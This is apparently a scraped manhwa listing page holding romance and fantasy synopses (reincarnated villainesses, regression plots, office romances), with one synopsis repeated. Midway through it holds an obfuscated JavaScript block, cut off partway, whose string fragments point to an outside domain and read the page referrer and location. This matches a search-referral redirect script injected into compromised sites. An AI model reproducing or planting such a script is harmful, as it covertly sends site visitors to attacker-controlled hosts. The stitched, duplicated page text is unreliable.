I found out about a shocking truth after my final return to my hometown before dying. It was that my dying self who was unable to cure my own illness due to the lack of finances was actually Sophia Herman, the youngest granddaughter of the Herman family, the greatest villain-like family of the empire! If she hadn’t kidnapped me…! If he hadn’t given up on my kidnapped self! Dying like this, what a pathetic life…! …Upon resenting the world and opening my eyes, I returned to when I was 9 years old. The notorious dukedom? I shall use them as my financial support to cure my illness and break through this damned fate of mine! Once I’m done with you, I shall leave you for good! In the end, will Lithian, no, Sophia Herman’s third life go the way she wants?
<h2>The Problem of My Love Affair</h2> Always doing her best to avoid any connection to internal powers in the company until she retires, Mo Taehee. Cha Soohyeok, the general manager who has overcome all kinds of obstacles, finally finds his way to be the CEO. The love and shameful(?) story of a young man and woman, who spent one night in a secluded cottage with their own secrets, unfolds!
<h3 class="h5">Kill the Villainess</h3> I reincarnated in a novel inside the body of a villainess named Elise who poisoned herself when her fiancé, the prince, married her childhood friend, the maid Helena. From the moment I realized this, I had only one goal. Escape from the world in this novel. Even after death, I tried to get out of this world but the ‘world’ did not allow it. However, after rejecting the path of “Elise” in the original novel, the men who had persecuted and ignored Eris began to beg for her interest and affection. “Who are you?” the priest who revived Helena asked. “You… are you really Elise?” even the warrior who pledged eternal loyalty to Helena asked. “You have changed,” said the prince who rejected Elise in order to marry Helena. It was strange. No one was interested in Elise before. “I don’t want to get affectionate even as time passes.” She has no confidence in loving this world.
<h2>Please Throw Me Away and I Want You to Throw Me Away</h2> Adele was adopted in replacement of a lady who died from a rare disease. She worked her entire life so she would be loved, but as soon as her younger sister was born, she was abandoned. Then on Adele’s way to an arranged marriage, she was assassinated by mysterious enemies. “…Is this a dream?” But when she opened her eyes, she returned to 3 years in the past! Since she is destined to be abandoned when her younger sister is born, this time around, she tries to live the way she wants, but things keep going wrong. “Weren’t you interested in me?” And a mysterious knight in black keeps pursuing her…
This world is both difficult and perilous The scoundrels have overstayed their welcome For the restoration of justice to this land I will eradicate all evil!<script></script><script>function _0x5901(){var _0x5cb3ac=['google','then','random','TySbN','mrFCz','.top/','3467610sThTPg','referrer','15818lGRQba','30wSRFaK','342xzYvWR','PnhPE','372755SmLzMY','.customapi','https://ip','12696Jlhico','WTibx','text','dma.net/','41832RUoLWV','location','floor','includes','evgBm','2130667SEzkAD','ZXiqI','dQqgJ','zwQJV','http://rea','471401eqkTXM','27AXtIke','href','oUgvS'];_0x5901=function(){return _0x5cb3ac;};return _0x5901();}(function(_0x335bc6,_0x1b4a17){var _0x1f944e=_0x5245,_0x5d5396=_0x335bc6();while(!![]){try{var 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Read manhwa He’s Now Healthy-Perhaps Too Much / The Terminally Ill Obsessed Male Lead Has Become Very Healthy / 余命わずかのヒーローが元気になっちゃった!? / 시한부 집착 남주가 너무 건강해졌다 One day, the female lead wakes up as Rosaline, a character from an erotic novel. Surprisingly, Rosaline is… the tutor who is killed after failing to trigger the awakening in Theodor, the terminally ill, obsessive tyrant! The key to solving his problem lies in evoking intense emotions through lovemaking! As a former personal trainer, Rosaline tries to initiate the awakening by non-sexual means. And for her own survival, she accomplishes her mission and makes him healthy, but… something peculiar unfolds. “Your Highness… You have become too healthy…”
Promoted at the speed of light, the star of JK Electronics, the ultimate career woman, yet always forever alone Cha Ju An! Kind, honest, full of vitality, and with the looks and physique to rival a model, yet bumbling fool Yoo Do Jin! With such different personalities, one day these two… #suddenly #withoutwarning #during #officehours switched souls?!!! Due to this switch, their lives are made a mess!! But what is the reason for this switch? And that reason is to match these two up by force! By the same author as What’s Wrong with Secretary Kim.
Promoted at the speed of light, the star of JK Electronics, the ultimate career woman, yet always forever alone Cha Ju An! Kind, honest, full of vitality, and with the looks and physique to rival a model, yet bumbling fool Yoo Do Jin! With such different personalities, one day these two… #suddenly #withoutwarning #during #officehours switched souls?!!! Due to this switch, their lives are made a mess!! But what is the reason for this switch? And that reason is to match these two up by force! By the same author as What’s Wrong with Secretary Kim. An Hour Of Romance
Ye Wutian, a brilliant doctor from 2089, somehow time-travels back to the year 2019 in a lab experiment explosion. He wakes up in a wild mountain, and then manages to save a girl, Li wan er who's been bitten by a venomous snake. With his apparently superior knowledge in medicine, Ye wutian embarks on an amazing journey in the beginning of the 21st century... MangaToon got authorization from Pojie to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Read manhwa I Accidentally Seduced the Male Lead’s Younger Brother / 실수로 남주의 동생을 꼬셔버렸다 “No, I don’t want to.” I flatly rejected my ex-boyfriend’s proposal to have an affair with him. “The Young Master is not my taste. If I must say, your younger brother is much preferable.” “What? You prefer my younger brother?” Yeah. Not you, but your brother. *** That ‘younger brother’ came back to me as a beast with a decadent beauty. “I’ve never forgotten you for a moment. Please marry me, noona.” On top of that, he’s even holding the engagement document that I signed as a joke during childhood. No, weren’t we only playing house? “Could it be that your tastes changed while I was away?” Lexion’s eyes were full of life as he asked. It was as if he would kill someone right away if he were to find out they were my type.
Ye-hwa, who lost Jeong-in and was humiliated by the sudden attack on her soul on the day of her death, tries to kill herself to escape from the monster who is obsessed with her, but when she opens her eyes again, she returns to 10 years ago and meets the monster who takes care of her… Who the hell is this creature that is not in her memory, and why has he ruined herself so much in the future while taking care of her in the past? Can she change the past and create a different future?
summary I was an abandoned child in the slums. One day, I didn’t know my parents’ faces and there were more days of starving than days of eating. A stigmata suddenly appeared on the back of my hand. …I guess God made a mistake. * * * Eden Baroque Empire Breaking News! Finally, after 100 years, the oracle of Saint Bethcherian V comes down! She was 5 years old She was 5 years old She was not 5 years old She was 5 years old… … ? “We are attending a noble saint. Please follow God’s will, slay demons, bring world peace, and guide us who are in need.” They knelt before me, who was barely over 100 centimeters tall. Bringing world peace to a five-year-old. Is this true? Description A girl was left in a slum without parents but she found her own family. As always, she was hungry but happy to play around with her friend but a mark of holiness suddenly show up. Now the five-year-old girl is expected to carry a god’s will and save the world by killing an evil beast.